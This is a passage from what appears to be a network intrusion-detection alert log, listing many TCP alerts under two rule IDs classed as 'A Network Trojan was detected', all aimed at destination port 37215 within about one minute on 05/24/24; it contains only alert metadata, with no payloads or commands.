              SID:2835222
              Source Port:40666
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.282865
              SID:2835222
              Source Port:56588
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926901
              SID:2829579
              Source Port:59524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.640213
              SID:2835222
              Source Port:51686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663502
              SID:2829579
              Source Port:44622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396675
              SID:2829579
              Source Port:46214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.395096
              SID:2835222
              Source Port:60804
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859990
              SID:2835222
              Source Port:49362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.430095
              SID:2829579
              Source Port:41454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.116063
              SID:2835222
              Source Port:37030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.432630
              SID:2835222
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.598951
              SID:2829579
              Source Port:45636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.864816
              SID:2829579
              Source Port:57406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.347046
              SID:2835222
              Source Port:47086
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575120
              SID:2829579
              Source Port:34120
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857766
              SID:2835222
              Source Port:56846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.368569
              SID:2829579
              Source Port:47470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575069
              SID:2835222
              Source Port:57836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534896
              SID:2829579
              Source Port:52010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856933
              SID:2829579
              Source Port:50484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055405
              SID:2829579
              Source Port:58302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.443973
              SID:2835222
              Source Port:41594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725133
              SID:2835222
              Source Port:42996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044621
              SID:2835222
              Source Port:54894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.542249
              SID:2829579
              Source Port:35168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099814
              SID:2835222
              Source Port:46210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061908
              SID:2829579
              Source Port:57524
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449140
              SID:2835222
              Source Port:33206
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.463134
              SID:2835222
              Source Port:51126
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313250
              SID:2835222
              Source Port:57926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.535281
              SID:2835222
              Source Port:46684
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188828
              SID:2835222
              Source Port:47472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507647
              SID:2829579
              Source Port:41568
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.040672
              SID:2829579
              Source Port:57516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.253116
              SID:2829579
              Source Port:53168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.189038
              SID:2835222
              Source Port:53432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.122542
              SID:2829579
              Source Port:56764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545461
              SID:2829579
              Source Port:38428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071030
              SID:2829579
              Source Port:44748
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.167444
              SID:2829579
              Source Port:47814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724426
              SID:2829579
              Source Port:46180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049802
              SID:2829579
              Source Port:45724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.455436
              SID:2835222
              Source Port:35352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.493086
              SID:2835222
              Source Port:51304
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.517941
              SID:2829579
              Source Port:41718
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.411277
              SID:2835222
              Source Port:40084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.664486
              SID:2829579
              Source Port:58476
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875758
              SID:2829579
              Source Port:56888
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.823655
              SID:2829579
              Source Port:51602
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188375
              SID:2829579
              Source Port:46364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.485215
              SID:2829579
              Source Port:55694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.504100
              SID:2829579
              Source Port:36140
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.969194
              SID:2829579
              Source Port:37426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.078358
              SID:2835222
              Source Port:59348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061477
              SID:2829579
              Source Port:57406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585143
              SID:2835222
              Source Port:55468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.582670
              SID:2835222
              Source Port:40412
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.530940
              SID:2835222
              Source Port:56950
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.460443
              SID:2835222
              Source Port:59932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.545296
              SID:2829579
              Source Port:34430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.486128
              SID:2829579
              Source Port:60216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101639
              SID:2829579
              Source Port:38512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.101380
              SID:2835222
              Source Port:42842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.041207
              SID:2835222
              Source Port:56692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.446674
              SID:2829579
              Source Port:53998
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.481444
              SID:2829579
              Source Port:50552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300343
              SID:2829579
              Source Port:51002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.313248
              SID:2835222
              Source Port:42188
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.045081
              SID:2829579
              Source Port:51030
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.364395
              SID:2829579
              Source Port:42266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.371955
              SID:2835222
              Source Port:58326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.506415
              SID:2835222
              Source Port:33156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568314
              SID:2835222
              Source Port:34344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.534273
              SID:2835222
              Source Port:33778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049924
              SID:2835222
              Source Port:58454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.044368
              SID:2829579
              Source Port:56850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.187387
              SID:2829579
              Source Port:54118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.185911
              SID:2835222
              Source Port:52760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.457869
              SID:2829579
              Source Port:50468
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.119852
              SID:2835222
              Source Port:37664
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.241928
              SID:2829579
              Source Port:51694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.300345
              SID:2829579
              Source Port:53092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.492362
              SID:2829579
              Source Port:57516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343650
              SID:2829579
              Source Port:48176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.397225
              SID:2835222
              Source Port:35346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459718
              SID:2835222
              Source Port:54662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.071005
              SID:2835222
              Source Port:54678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.250659
              SID:2835222
              Source Port:39388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.826056
              SID:2829579
              Source Port:33930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.197299
              SID:2829579
              Source Port:39362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.980979
              SID:2829579
              Source Port:48590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.368784
              SID:2829579
              Source Port:49846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.878806
              SID:2829579
              Source Port:51296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.487396
              SID:2829579
              Source Port:33794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.122172
              SID:2829579
              Source Port:33736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.053497
              SID:2835222
              Source Port:52784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.705929
              SID:2829579
              Source Port:55138
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.533317
              SID:2829579
              Source Port:51438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.538209
              SID:2835222
              Source Port:33428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.869593
              SID:2835222
              Source Port:35130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.456811
              SID:2829579
              Source Port:39712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575281
              SID:2829579
              Source Port:49894
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408080
              SID:2835222
              Source Port:49118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049520
              SID:2835222
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.317987
              SID:2829579
              Source Port:47196
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.924239
              SID:2829579
              Source Port:41674
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.448763
              SID:2835222
              Source Port:56892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.835263
              SID:2835222
              Source Port:38870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.478464
              SID:2835222
              Source Port:41908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.872015
              SID:2829579
              Source Port:39854
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492537
              SID:2829579
              Source Port:39358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061190
              SID:2829579
              Source Port:33162
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859056
              SID:2829579
              Source Port:45406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231841
              SID:2835222
              Source Port:37724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.100863
              SID:2835222
              Source Port:43348
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.362153
              SID:2829579
              Source Port:41098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.873784
              SID:2829579
              Source Port:48050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.369076
              SID:2835222
              Source Port:37830
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.347553
              SID:2835222
              Source Port:39522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858938
              SID:2829579
              Source Port:35040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.363193
              SID:2835222
              Source Port:59136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.689859
              SID:2835222
              Source Port:38640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188649
              SID:2829579
              Source Port:40766
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.636621
              SID:2829579
              Source Port:58232
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115310
              SID:2829579
              Source Port:58680
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.837349
              SID:2835222
              Source Port:57028
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.799376
              SID:2829579
              Source Port:33212
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.622944
              SID:2829579
              Source Port:56338
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.554185
              SID:2835222
              Source Port:41512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308471
              SID:2829579
              Source Port:39708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548122
              SID:2835222
              Source Port:60730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.427389
              SID:2835222
              Source Port:46398
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.420495
              SID:2835222
              Source Port:59218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.377173
              SID:2835222
              Source Port:32882
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.575372
              SID:2829579
              Source Port:41238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550580
              SID:2835222
              Source Port:49842
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.129715
              SID:2835222
              Source Port:47012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049762
              SID:2835222
              Source Port:48156
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492508
              SID:2835222
              Source Port:40352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.264776
              SID:2835222
              Source Port:40474
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575785
              SID:2835222
              Source Port:50090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.206434
              SID:2829579
              Source Port:38958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.988496
              SID:2829579
              Source Port:47694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.449082
              SID:2835222
              Source Port:54968
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.536911
              SID:2829579
              Source Port:54676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.358841
              SID:2829579
              Source Port:60668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234465
              SID:2835222
              Source Port:45982
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.480898
              SID:2829579
              Source Port:41862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.749746
              SID:2829579
              Source Port:51048
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.362331
              SID:2829579
              Source Port:33552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433197
              SID:2829579
              Source Port:36906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.074030
              SID:2835222
              Source Port:34470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.680462
              SID:2835222
              Source Port:43792
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.857740
              SID:2829579
              Source Port:48100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.124886
              SID:2835222
              Source Port:46844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199787
              SID:2835222
              Source Port:45216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.433639
              SID:2829579
              Source Port:50578
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.484603
              SID:2835222
              Source Port:39654
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.573235
              SID:2835222
              Source Port:52330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.726529
              SID:2835222
              Source Port:39812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.624413
              SID:2835222
              Source Port:50006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.234438
              SID:2835222
              Source Port:60326
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.595521
              SID:2829579
              Source Port:44926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.661298
              SID:2835222
              Source Port:57034
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188168
              SID:2829579
              Source Port:58310
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.768195
              SID:2829579
              Source Port:33788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.875764
              SID:2835222
              Source Port:50442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.637676
              SID:2829579
              Source Port:50564
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.662527
              SID:2829579
              Source Port:33724
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.574701
              SID:2835222
              Source Port:45442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.724959
              SID:2835222
              Source Port:53478
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.115328
              SID:2829579
              Source Port:48538
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431466
              SID:2835222
              Source Port:42926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.431601
              SID:2835222
              Source Port:47650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491554
              SID:2829579
              Source Port:37778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.501497
              SID:2835222
              Source Port:41360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433270
              SID:2835222
              Source Port:55056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.394547
              SID:2835222
              Source Port:53504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.299980
              SID:2829579
              Source Port:35104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.550580
              SID:2835222
              Source Port:39708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.502611
              SID:2835222
              Source Port:52324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.859816
              SID:2829579
              Source Port:58406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.103300
              SID:2829579
              Source Port:41294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.408080
              SID:2835222
              Source Port:47442
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151134
              SID:2835222
              Source Port:55824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802004
              SID:2835222
              Source Port:43704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233753
              SID:2829579
              Source Port:51026
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.630633
              SID:2835222
              Source Port:53686
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.360704
              SID:2835222
              Source Port:58900
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.568310
              SID:2835222
              Source Port:43892
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.744838
              SID:2829579
              Source Port:34092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.965597
              SID:2835222
              Source Port:51756
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.543670
              SID:2835222
              Source Port:44012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.433340
              SID:2835222
              Source Port:44514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.270742
              SID:2829579
              Source Port:58066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.055299
              SID:2835222
              Source Port:54054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.553293
              SID:2835222
              Source Port:51256
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.856763
              SID:2835222
              Source Port:39660
              Destination Port:37215
